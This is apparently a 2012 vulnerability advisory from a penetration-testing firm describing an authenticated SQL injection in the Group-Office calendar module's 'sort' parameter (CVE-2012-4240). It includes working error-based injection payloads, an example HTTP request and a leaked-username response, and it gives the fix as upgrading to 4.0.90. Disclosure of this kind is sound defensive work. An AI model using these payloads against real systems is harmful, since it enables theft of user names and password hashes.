/-------------------------------------\ | Group-Office Calendar SQL Injection | \-------------------------------------/ Summary ======= Versions of Group-Office (a web app for online collaboration) prior to 4.0.90 are subject to a SQL injection vulnerability located in the calendar module. A PHP file, used to serve data in the JSON format, does not sufficiently sanitise a user-supplied parameter injected into the ORDER BY part of an SQL query. An attacker can leverage this flaw to extract information from the database via SQL errors. CVE number: CVE-2012-4240 Impact: High Vendor homepage: http://www.group-office.com/ Vendor notified: 19/07/2012 Credit: Chris Cooper and Joseph Sheridan Homepage: http://www.reactionpenetrationtesting.co.uk/ This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/group-office-sqli.html Affected Products ======== ======== Confirmed in Group-Office community 4.0.71, 4.0.73 and 4.0.88. Other versions may also be affected. Details ======= A 'sort' parameter on the page /modules/calendar/json.php was found to be subject to a SQL injection vulnerability. It was possible to inject arbitrary SQL statements into an ORDER BY clause, retrieving information from the database via an error message. The attacker must be authenticated as a valid user in order for the attack to be successful. Injecting the following SQL code into the 'sort' parameter will trigger the vulnerability, retrieving the first user's username. Changing 'username' to 'password' retrieves their hashed password. For version 4.0.71: ExtractValue(1,CONCAT(0x5c,(SELECT username FROM go_users LIMIT 1))) Or for versions 4.0.73 and 4.0.88: id`,ExtractValue(1,CONCAT(0x5c,(SELECT username FROM go_users LIMIT 1)))# --- Example Request (version 4.0.71): +-------------------------------- POST /groupoffice/modules/calendar/json.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 162 Cookie: groupoffice=tgocfuhoh7lrqo0mckfef4us04; GO_LANGUAGE=en_UK sort=ExtractValue(1,CONCAT(0x5c,(SELECT%20username%20FROM%20go_users%20LIMIT %201)))&dir=ASC&task=writable_views&limit=20&security_token=pfi5lckw3r9qm64n adgb --- Example Response (version 4.0.71): +--------------------------------- HTTP/1.1 200 OK Date: Fri, 20 Jul 2012 14:16:09 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 397 Content-Type: text/html; charset=UTF-8 {"feedback":"Database error:<\/b> Invalid SQL: SELECT SQL_CALC_FOUND_ROWS v.* FROM cal_views v INNER JOIN go_acl a ON (v.acl_id = a.acl_id AND a.level>10 AND (a.user_id=1 OR a.group_id IN (1,2,3))) GROUP BY v.id ORDER BY ExtractValue(1,CONCAT(0x5c,(SELECT username FROM go_users LIMIT 1))) ASC LIMIT 0,20
\nMySQL Error<\/b>: 1105 (XPATH syntax error: '\\admin')
\n","success":false} Impact ====== An authenticated attacker might be able to take control of the database within the context of the MySQL user, and potentially use this as leverage to further compromise the host machine. Solution ======== Upgrade to Group-Office community 4.0.90. Distribution ============ In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients. * bugtraq () securityfocus com * full-disclosure () lists grok org uk Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates: http://www.reactionpenetrationtesting.co.uk/group-office-sqli.html ============================================================================ == Reaction Information Security Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF Phone: +44 (0)1227 785050 Email: research () reactionis {dot} co {dot} uk Web: http://www.reactionpenetrationtesting.co.uk